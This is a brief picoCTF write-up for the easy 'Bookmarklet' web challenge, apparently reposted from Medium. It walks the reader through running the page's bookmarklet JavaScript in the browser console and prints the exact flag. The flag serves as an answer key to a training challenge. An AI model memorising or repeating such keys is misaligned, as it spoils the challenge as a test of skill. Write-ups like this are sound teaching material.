PicoGym Web Exploitation Writeup | Bookmarklet | Easy | PicoCTF
easy ctf picoctf web easy-web easy-picoctf-web easy-picoctf picoctf-web
PicoGym Web Exploitation Writeup | Bookmarklet | Easy | PicoCTF
Originally posted on my Medium page.
In this challenge, we’re asked to uncover a hidden flag using a bookmarklet.
A bookmarklet is a small piece of JavaScript code saved as a browser bookmark. When clicked, it runs on the current webpage — and in this case, it’s designed to reveal the flag for us.
By clicking on launch instance, we are given with the link to the website.
Let’s visit the website, explore how the bookmarklet works, and grab that flag!
On the webpage, we can see a message and a JavaScript bookmarklet.
Copy the JavaScript code.
Now, let’s run this code manually using the browser’s developer console:
- Press Ctrl + Shift + I (or right-click → Inspect)
- Go to the Console tab
- Paste the copied JavaScript code into the console.
Press Enter to execute the code.
An alert box pops up displaying the flag.
The flag is: picoCTF{p@g3_turn3r_1d1ba7e0}
📖 Want more CTF and OSINT writeups like this? Check out my Medium page here.